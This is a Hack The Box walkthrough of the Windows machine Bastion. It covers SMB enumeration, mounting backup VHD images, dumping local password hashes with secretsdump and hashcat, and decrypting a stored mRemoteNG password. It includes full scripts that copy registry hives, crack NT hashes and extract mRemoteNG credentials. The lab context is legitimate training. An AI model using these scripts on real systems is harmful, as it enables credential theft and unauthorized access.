Hackthebox - Bastion
Windows
Nmap
HTTP
While investigating SMB we can also launch a gobuster scan on the open HTTP ports (5985 and 47001 are the usual WinRM / HTTP.sys listeners on Windows rather than a web application, so expectations are low):
gobuster dir -u http://10.10.10.134:47001/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
and
gobuster dir -u http://10.10.10.134:5985/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Nothing here (the foothold seems to come through SMB anyway).
SMB
Looking at the nmap output, SMB seems worth investigating.
Enum4linux
smbmap
smbclient
We are finally able to connect to a share this way:
Let's get the content. We can download everything in one go using this set of commands:
We have to abort this, as the note says:
Big hint to investigate this backup folder.
Let's just have a look around for now.
Here is an article by Jake Binstein that is useful for understanding the folder layout (check out the Structure part at the end). That is a start.
We get information about the name of the PC and a potential user:
L4mpje-PC
Looking further into the files we find VHD images. Here is an article by Samuel Whang on how to mount this type of file.
vhd file
Following Samuel Whang's article, we first create a directory to mount the remote share:
sudo mkdir /mnt/remote
Note: I am going to sudo su for the rest of the process.
Let's create a mount point for the first vhd file:
mkdir /mnt/vhd1
Let's now mount it with guestmount:
guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd1 -v
Let's do the same for the 2nd vhd file:
mkdir /mnt/vhd2
guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd2 -v
In my case it worked for the 2nd file only. I am going to inspect it and then troubleshoot the 1st file if needed (note: I realized later that one is a boot partition and the other the disk, so that is why one of the images is useless for us).
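The share listing, the mount of the share and the guestmount of the right image above can be chained into one script. The following is an added example, not the writeup's own commands: it assumes the share is called Backups (confirm with smbclient -L), the mount points /mnt/remote and /mnt/vhd, cifs-utils and libguestfs-tools installed, and that it runs as root. It picks the larger VHD automatically (the System Reserved image is a few tens of MB, the Windows volume several GB) and checks that the registry hives are actually reachable before copying them, which is the failure the note above describes.

```shell
#!/usr/bin/env sh
# Added example, not part of the original writeup: list the share, mount it,
# choose the VHD that holds the Windows volume, mount it read-only with
# guestmount and confirm the registry hives are reachable.
# Assumptions: share name "Backups", the mount points below, cifs-utils and
# libguestfs-tools installed, run as root (guestmount needs FUSE).

TARGET="10.10.10.134"
SHARE="Backups"        # assumption: not shown on the page, check smbclient -L
REMOTE="/mnt/remote"
VHD_MNT="/mnt/vhd"

# Null-session share listing and a recursive directory listing of one share
list_shares()       { smbclient -N -L "//$TARGET/"; }
list_share_files()  { smbclient -N "//$TARGET/$SHARE" -c 'recurse ON; ls'; }

mount_share() {
    mkdir -p "$REMOTE"
    # guest + read-only: we only read the backup, and mounting avoids pulling
    # gigabytes of VHD over the VPN the way a blind mget would
    mount -t cifs "//$TARGET/$SHARE" "$REMOTE" -o guest,ro
}

# The backup set carries two images: a small System Reserved (boot) partition
# and the actual Windows volume. Size tells them apart.
pick_largest_vhd() {
    find "$1" -type f -name '*.vhd' -exec du -k {} + \
        | sort -n | tail -n 1 | cut -f2-
}

mount_vhd() {
    mkdir -p "$VHD_MNT"
    # show what libguestfs sees first: a boot image has no Windows install
    # for --inspector to find, which is why one of the two mounts fails
    virt-filesystems --add "$1" --all --long -h
    guestmount --add "$1" --inspector --ro "$VHD_MNT"
}

# True when the SAM, SECURITY and SYSTEM hives exist under a mounted volume
hives_present() {
    d="$1/Windows/System32/config"
    for h in SAM SECURITY SYSTEM; do
        [ -f "$d/$h" ] || return 1
    done
    return 0
}

if [ "${1:-}" = "run" ]; then
    list_shares
    mount_share
    vhd=$(pick_largest_vhd "$REMOTE/WindowsImageBackup")
    echo "[*] using $vhd"
    mount_vhd "$vhd"
    if hives_present "$VHD_MNT"; then
        cp "$VHD_MNT"/Windows/System32/config/SAM \
           "$VHD_MNT"/Windows/System32/config/SECURITY \
           "$VHD_MNT"/Windows/System32/config/SYSTEM .
        echo "[+] hives copied to $(pwd)"
    else
        echo "[-] no registry hives under $VHD_MNT, wrong image?" >&2
        exit 1
    fi
fi
```

Run it as `sh mount_backup.sh run`; without the argument it only defines the functions. Everything is mounted read-only, so nothing on the share or in the image is modified, and the hive copy only happens once the inspector has found a Windows volume.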
Let's copy the SAM, SECURITY and SYSTEM hives into my working directory:
cp SAM SECURITY SYSTEM ../../../../../home/kali/Documents/hackthebox/bastion
Let's try the password on SSH.
We can also note from the Administrator entry that no LM hash is stored: the LM field holds the blank/null value (aad3b435b51404eeaad3b435b51404ee), so only the NT hash can be attacked.
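The hash dump and the LM-hash observation above can be scripted against the copied hives. This is an added example, not the writeup's own commands: it assumes impacket's secretsdump.py and hashcat are on PATH and rockyou.txt sits at the usual Kali path; SAMPLE_DUMP is constructed in secretsdump's output format, it is not the box's output. The parser flags every account whose LM field is the empty-string hash (LM storage disabled) and writes user:nthash pairs for hashcat mode 1000.

```shell
#!/usr/bin/env sh
# Added example, not part of the original writeup: dump the local account
# hashes from the copied hives offline, flag whether each account still has
# an LM hash, and build a hashcat input for the NT hashes.
# Assumptions: impacket's secretsdump.py and hashcat on PATH, rockyou.txt at
# the Kali path; SAMPLE_DUMP is constructed, not the box's real output.

EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"   # LM hash of "": LM storage disabled
WORDLIST="/usr/share/wordlists/rockyou.txt"

# Offline mode: LOCAL means "parse these hive files", no target involved
dump_hives() {
    secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
}

# secretsdump SAM lines are  user:rid:lmhash:nthash:::  ; banner lines, DPAPI
# keys and LSA secrets lack two 32-hex fields in positions 3 and 4 and are skipped
lm_status() {
    awk -F: -v empty="$EMPTY_LM" '
        NF >= 4 && length($3) == 32 && length($4) == 32 {
            print $1, ($3 == empty ? "LM-disabled" : "LM-present")
        }'
}

# user:nthash, which hashcat -m 1000 --username accepts directly
to_hashcat() {
    awk -F: 'NF >= 4 && length($3) == 32 && length($4) == 32 { print $1 ":" $4 }'
}

crack_nt() {
    hashcat -m 1000 --username "$1" "$WORDLIST"
    hashcat -m 1000 --username "$1" --show
}

# Constructed sample in secretsdump's format. 31d6cfe0... is NT(""),
# e52cac67.../8846f7ea... are LM/NT of "password"; the L4mpje value is a dummy.
SAMPLE_DUMP='[*] Target system bootKey: 0x00112233445566778899aabbccddeeff
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets'

if [ "${1:-}" = "run" ]; then
    dump_hives > secretsdump.out
    lm_status < secretsdump.out
    to_hashcat < secretsdump.out > nt.hashes
    crack_nt nt.hashes
else
    # no argument: exercise the parsers on the constructed sample
    printf '%s\n' "$SAMPLE_DUMP" | lm_status
fi
```

An account reported as LM-present (like the constructed "legacy" entry) is the one to attack first: LM is case-insensitive, split into two 7-character halves and cracks in seconds with -m 3000, whereas the NT hashes go through the wordlist in mode 1000.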
SSH
Privesc
Let's get winPEAS onto the target. Nothing really stands out.
PowerUp is more verbose. It points at a DLL hijack.
I tried the techniques listed here; however, with our current rights nothing works...
Let's go back to manual enumeration.
Among the installed programs this one is unusual: mRemoteNG. We can have a look at the changelog to get the version, which seems to be 1.76.11.
After a Google search we get this article. It turns out this article uses this very box as an example... it is a big spoiler xD. But in a real context we would have looked in the configuration files anyway and googled something like "decrypt mremoteng passwords" or something similar.
Indeed, the file confCons.xml contains an (encrypted) password:
We can follow step 3 of the article:
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
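A real confCons.xml (mRemoteNG keeps it under %APPDATA%\mRemoteNG\) usually holds more than one connection, so it is worth pulling every entry rather than copying one blob by hand. The following is an added example, not the writeup's or the article's code: it assumes mremoteng_decrypt.py from the linked article is in the current directory, and the XML embedded below is a constructed sample, not the file from the box. One caveat: the blobs are AES-GCM encrypted with a key derived from mRemoteNG's master password, and the default master password is mR3m, which is why the command above needs no extra argument; if the user set a custom one, the Protected attribute on the Connections element will not verify either and you have to supply the password to the script (its option is -p in the linked version, an assumption to confirm with --help).

```shell
#!/usr/bin/env sh
# Added example, not part of the original writeup: extract every connection
# entry (name, user, host, encrypted password) from an mRemoteNG confCons.xml
# and hand each blob to the decrypt script the article links.
# Assumptions: mremoteng_decrypt.py in the current directory; SAMPLE_XML is a
# constructed sample, not the file found on the box.

extract_creds() {
    # mRemoteNG writes one <Node .../> per line with attributes in a fixed
    # order (Name ... Username ... Password ... Hostname ...); emit
    # name|user|host|password and drop lines missing any of the four
    grep '<Node ' | sed -n \
        's/.*Name="\([^"]*\)".*Username="\([^"]*\)".*Password="\([^"]*\)".*Hostname="\([^"]*\)".*/\1|\2|\4|\3/p'
}

decrypt_all() {
    # Entries with an empty Password attribute have nothing to decrypt
    extract_creds | while IFS='|' read -r name user host pw; do
        [ -n "$pw" ] || continue
        printf '%s (%s@%s): ' "$name" "$user" "$host"
        # </dev/null so the script cannot swallow the rest of our pipe
        python3 mremoteng_decrypt.py -s "$pw" < /dev/null
    done
}

# Constructed sample mirroring the 1.76 layout; "Protected" is the master
# password check, the Node Password values are placeholder base64.
SAMPLE_XML='<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="c29tZXRoaW5n" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="1" Username="Administrator" Domain="" Password="AAAAexample1==" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
    <Node Name="Jump" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="2" Username="svc" Domain="" Password="" Hostname="127.0.0.2" Protocol="SSH2" Port="22" />
</mrng:Connections>'

if [ "${1:-}" = "run" ]; then
    # sh mremoteng_creds.sh run /path/to/confCons.xml
    decrypt_all < "${2:-confCons.xml}"
else
    # no argument: show the parser on the constructed sample
    printf '%s\n' "$SAMPLE_XML" | extract_creds
fi
```

The parser relies on the attribute order mRemoteNG itself writes; a hand-edited file could reorder them, in which case an XML-aware tool such as xmlstarlet is the safer choice.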